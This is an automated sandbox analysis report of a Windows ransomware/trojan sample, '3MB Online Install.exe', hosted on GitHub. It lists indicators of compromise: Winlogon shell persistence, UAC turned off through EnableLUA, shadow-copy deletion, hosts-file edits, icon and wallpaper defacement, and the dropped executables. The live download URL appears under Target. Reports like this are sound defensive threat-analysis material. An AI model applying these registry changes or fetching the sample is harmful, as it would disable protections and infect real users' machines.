hxxps://github[.]com/theevilteam/KILLER-CLOWN-extracted/raw/main/3MB%20Online%20Install[.]exe

Analysis

max time kernel
137s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20240426-uk
resource tags

arch:x64arch:x86image:win10v2004-20240426-uklocale:uk-uaos:windows10-2004-x64systemwindows
submitted
22-05-2024 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/theevilteam/KILLER-CLOWN-extracted/raw/main/3MB%20Online%20Install.exe

Score

10^/10

defense_evasion evasion execution impact persistence ransomware trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Winlog.exeWinlog.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\explorer.exe, C:\\java\\clown.exe"	Winlog.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\explorer.exe, C:\\java\\clown.exe"	Winlog.exe

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification \??\c:\Windows\System32\drivers\etc\hosts cmd.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

description	ioc	process
File opened for modification	\??\c:\Windows\System32\drivers\etc\hosts	cmd.exe

Modifies Installed Components in the registry 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

ie4uinit.exeie4uinit.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,1081,19041,0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,1081,19041,0"	ie4uinit.exe

Checks computer location settings 2 TTPs 42 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

auto.exestartWPChanger.execlown.exestartWinlog.exeStart.exestartcur.exestartkey.exe3MB Online Install.exedef.exekey.exef.exestartWinlog.exestarticons.exeuac.exeicons.exestartvol.exestartf.exe3MB Online Install.exestartuac.exeDriver.exestartExplorerIcons.exeExplorerIcons.exeattention.exe3MB Online Install.exeStart.exeStart.exeStart.exestartauto.exestartban.exevol.exeStart.exe3MB Online Install.exestartdelstartup.exedelstartup.exestartScreenBlocker.exe3MB Online Install.execlown.exestartcur.exehosts.exewp.exestartban.exestarthosts.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	auto.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startWPChanger.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	clown.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startWinlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startcur.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startkey.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	3MB Online Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	def.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	key.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startWinlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	starticons.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	uac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	icons.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startvol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	3MB Online Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startuac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Driver.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startExplorerIcons.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	ExplorerIcons.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	attention.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	3MB Online Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startauto.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startban.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	vol.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	Start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	3MB Online Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startdelstartup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	delstartup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startScreenBlocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	3MB Online Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	clown.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startcur.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	hosts.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	wp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	startban.exe
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	starthosts.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.exe	cmd.exe

Executes dropped EXE 64 IoCs

Processes:

3MB Online Install.exeStart.execurl.exe3MB Online Install.exeStart.execurl.exe3MB Online Install.exeStart.execurl.exe3MB Online Install.exeStart.execurl.exe3MB Online Install.exeStart.execurl.exeDriver.execlown.exestartban.exedef.exestartcur.exestartkey.execur.exekey.exeDisDef.exeban.exeban.exe7z.exestartdelstartup.exestartuac.exestartauto.exestartWinlog.exestartExplorerIcons.exestarticons.exedelstartup.exeuac.exeauto.exeWinlog.exeExplorerIcons.exeicons.exestarthosts.exestartWPChanger.execlown.exeWPChanger.exestartvol.exestartScreenBlocker.exestartcur.exeattention.exehosts.execur.exestartWinlog.exeScreenBlocker.exestartf.exestartban.exeform.exevol.exeWinlog.exeban.exef.exeban.exewp.exewp.exempv.comhide.exempv.exe

pid	process
5772	3MB Online Install.exe
5952	Start.exe
6064	curl.exe
6108	3MB Online Install.exe
2384	Start.exe
236	curl.exe
380	3MB Online Install.exe
4916	Start.exe
3592	curl.exe
5532	3MB Online Install.exe
5588	Start.exe
2680	curl.exe
5680	3MB Online Install.exe
544	Start.exe
1196	curl.exe
5984	Driver.exe
1308	clown.exe
6012	startban.exe
5068	def.exe
5356	startcur.exe
5352	startkey.exe
5540	cur.exe
1908	key.exe
1592	DisDef.exe
4536	ban.exe
3612	ban.exe
740	7z.exe
5884	startdelstartup.exe
844	startuac.exe
5440	startauto.exe
5088	startWinlog.exe
5964	startExplorerIcons.exe
5872	starticons.exe
3180	delstartup.exe
5996	uac.exe
3996	auto.exe
5368	Winlog.exe
3140	ExplorerIcons.exe
1464	icons.exe
5240	starthosts.exe
284	startWPChanger.exe
296	clown.exe
4316	WPChanger.exe
844	startvol.exe
4116	startScreenBlocker.exe
5732	startcur.exe
5684	attention.exe
5588	hosts.exe
3284	cur.exe
6120	startWinlog.exe
4992	ScreenBlocker.exe
5028	startf.exe
1612	startban.exe
4360	form.exe
5356	vol.exe
3744	Winlog.exe
5536	ban.exe
5284	f.exe
888	ban.exe
2728	wp.exe
5876	wp.exe
5560	mpv.com
5576	hide.exe
5408	mpv.exe

Loads dropped DLL 15 IoCs

Processes:

ban.exe7z.exeban.exe

pid	process
3612	ban.exe
3612	ban.exe
3612	ban.exe
3612	ban.exe
3612	ban.exe
3612	ban.exe
3612	ban.exe
740	7z.exe
888	ban.exe
888	ban.exe
888	ban.exe
888	ban.exe
888	ban.exe
888	ban.exe
888	ban.exe

Modifies system executable filetype association 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon\ = "C:\\java\\icons\\1.ico"	reg.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

ie4uinit.exeie4uinit.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32	ie4uinit.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

20 raw.githubusercontent.com
21 raw.githubusercontent.com

flow	ioc
20	raw.githubusercontent.com
21	raw.githubusercontent.com

Drops file in System32 directory 2 IoCs

Processes:

ReAgentc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

WPChanger.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Desktop\Wallpaper = "C:\\java\\Wallpaper\\wallpaper.bmp"	WPChanger.exe

Drops file in Windows directory 8 IoCs

Processes:

ReAgentc.exeReAgentc.exe

description	ioc	process
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

2432 timeout.exe
4904 timeout.exe
3988 timeout.exe
4664 timeout.exe

pid	process
2432	timeout.exe
4904	timeout.exe
3988	timeout.exe
4664	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5268 taskkill.exe

pid	process
5268	taskkill.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

WPChanger.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Desktop\TileWallpaper = "0"	WPChanger.exe

Modifies File Icons 64 IoCs

ransomware

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\83 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\140 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\19 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\39 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\18 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\11 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\101 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\144 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\31 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\17 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\92 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\145 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\56 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\58 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\67 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\129 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\20 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\88 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\121 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\122 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\143 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\148 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\98 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\116 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\109 = "C:\\java\\icons\\5.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\53 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\55 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\108 = "C:\\java\\icons\\5.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons	reg.exe

Modifies Internet Explorer settings 1 TTPs 11 IoCs

adware spyware

Modify Registry

T1112

Processes:

ie4uinit.exeie4uinit.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Internet Explorer\Main\OperationalData = "12"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe

Modifies Shortcut Icons 1 IoCs

Modifies/removes arrow indicator from shortcut icons.

ransomware

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\29 = "C:\\java\\icons\\5.ico"	reg.exe

Modifies registry class 64 IoCs

Processes:

reg.exeie4uinit.exereg.exereg.exeie4uinit.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.html\OpenWithProgIds	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\shell\open\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\command	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\""	ie4uinit.exe
